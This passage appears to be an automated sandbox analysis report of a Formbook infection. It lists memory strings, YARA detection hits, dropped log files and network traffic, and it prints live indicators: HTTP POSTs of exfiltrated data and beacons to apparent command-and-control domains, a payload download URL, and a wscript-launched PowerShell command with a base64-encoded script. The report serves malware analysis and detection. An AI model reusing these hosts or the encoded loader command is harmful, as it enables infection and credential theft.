      Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comjU
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
      Source: explorer.exe, 0000001C.00000000.2205065965.00000000050E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/ClassId
      Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715827364.00000000030D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
      Source: explorer.exe, 0000001C.00000000.2207491239.000000000527A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-report
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: unknownHTTP traffic detected: POST /wn19/ HTTP/1.1Host: www.borneadomicile.comConnection: closeContent-Length: 227520Cache-Control: no-cacheOrigin: http://www.borneadomicile.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.borneadomicile.com/wn19/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 56 6e 58 41 68 3d 49 66 68 31 75 65 64 70 75 42 49 76 6b 78 69 55 6a 64 76 6e 64 73 4d 4f 6c 2d 73 4d 67 66 76 47 38 6b 59 32 38 70 55 4d 47 51 65 6c 77 70 62 2d 33 4e 56 33 39 30 62 51 32 76 61 42 70 33 4b 53 4f 4b 6d 56 68 4c 53 37 39 45 57 74 48 79 63 32 4a 67 32 6c 59 58 6b 38 4a 69 6f 53 54 79 6d 6a 35 6b 54 36 30 54 65 74 77 72 50 47 59 76 71 4c 31 77 32 66 61 53 55 6e 6d 39 68 50 5a 4d 37 56 43 50 51 51 79 78 34 30 7a 6f 65 43 76 67 65 65 49 6d 48 45 52 6f 62 6c 45 4c 43 66 32 4e 6d 61 46 2d 44 73 43 63 65 67 4f 46 44 4f 4a 71 38 5f 46 4e 34 4b 4b 36 28 48 4d 7a 63 6c 47 65 42 37 35 32 41 7a 37 73 62 37 32 2d 45 65 4d 55 46 33 28 7a 44 6d 78 56 57 43 76 45 68 5a 62 32 35 44 42 32 67 63 72 5a 58 4b 52 77 6e 75 52 44 68 64 63 68 48 48 6e 4e 6c 67 78 56 28 50 46 34 51 63 51 50 55 30 47 67 37 47 69 39 4e 45 66 77 50 39 75 79 76 31 4f 55 63 55 30 48 6f 65 34 69 4f 72 63 42 46 39 4b 47 53 34 4f 4b 59 55 44 61 5a 79 32 73 7e 4f 75 39 4c 51 6f 59 58 33 75 49 6d 37 46 52 52 74 78 58 4a 69 49 62 49 66 62 6f 71 32 5a 58 45 37 54 65 46 65 75 5a 4f 6d 33 6e 39 36 6e 6f 69 38 4b 57 5a 69 47 59 64 4a 64 59 54 57 52 31 75 79 44 50 78 55 46 31 52 64 4b 77 4f 68 6c 54 32 2d 59 53 34 33 56 38 79 7a 6b 55 41 34 39 74 37 49 4b 73 32 59 68 39 66 66 62 64 7a 57 4c 36 48 51 52 71 74 4a 71 51 41 41 30 2d 57 39 52 62 43 68 4f 36 4f 38 6c 4a 72 46 6f 69 72 43 71 68 7a 5a 7e 7a 70 76 56 44 62 52 4b 42 7a 57 73 30 51 67 6b 71 48 69 38 4e 69 35 71 66 6b 35 52 62 4e 77 30 31 73 42 33 55 45 64 62 31 38 41 32 2d 51 6f 4a 42 68 5f 6f 35 52 6e 44 41 59 73 77 75 77 57 39 31 50 63 38 55 6a 53 36 78 4e 4b 34 43 4c 45 6e 68 30 6a 42 34 62 6e 41 4a 32 4b 7e 6c 6f 49 69 70 4e 59 35 6e 72 78 57 74 55 45 79 66 46 2d 71 37 32 65 50 75 66 39 35 48 34 51 7e 47 45 37 66 4b 78 76 42 78 4c 44 52 45 77 41 62 5f 69 2d 7e 62 37 30 38 57 6a 78 5a 2d 78 4a 59 6b 33 44 48 64 38 49 4a 67 6a 42 4d 4f 35 49 56 37 4c 48 79 37 4c 34 30 4a 67 42 50 7a 34 4f 53 43 77 33 58 73 66 73 56 75 58 67 50 4a 43 2d 69 76 30 31 63 68 62 34 54 62 77 58 49 59 6b 5f 6e 67 34 38 69 65 73 41 39 58 57 78 76 36 6e 58 70 30 62 45 32 59 4f 72 7a 58 62 56 56 77 66 59 6a 68 45 6d 33 54 6b 77 4f 66 31 45 72 79 56 38 7e 4b 54 44 5a 79 42 6c 6a 43 66 65 77 5a 50 4a 35 5a 34 65 39 6c 78 42 75 43 48 61 62 55 56 33 56 74 65 4c 76 64 55 61 63 47 41 4c 42 39 63 63 75 46 63 2d 63 5a 74 69 6a 79 4b 61 66 49 31 73 4b 39 30 71 69 78 75 46 5a 69 74 5f 33 53 55 4f 6b 4f 77 38 30 42 71 30 61 49 72 58 77 4e 75 4a 34 56 56 2d 37 4f 47 51 7a 30 4c 35 50 71 39 4d 47 6e 4f 69 58 49 61 75 56 4a 67 36 79 32 46 33 49 4f 77 41 41
      Source: unknownDNS traffic detected: queries for: barsam.com.au
      Source: global trafficHTTP traffic detected: GET /bin_FCWtLoO90.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: barsam.com.auCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1Host: www.borneadomicile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1Host: www.clickleaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1Host: www.repaircilinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1Host: www.linqxw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\chkdsk.exeDropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrv.iniJump to dropped file
      Source: C:\Program Files\Mozilla Firefox\firefox.exeDropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrf.iniJump to dropped file
      Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16636
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16636
      Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
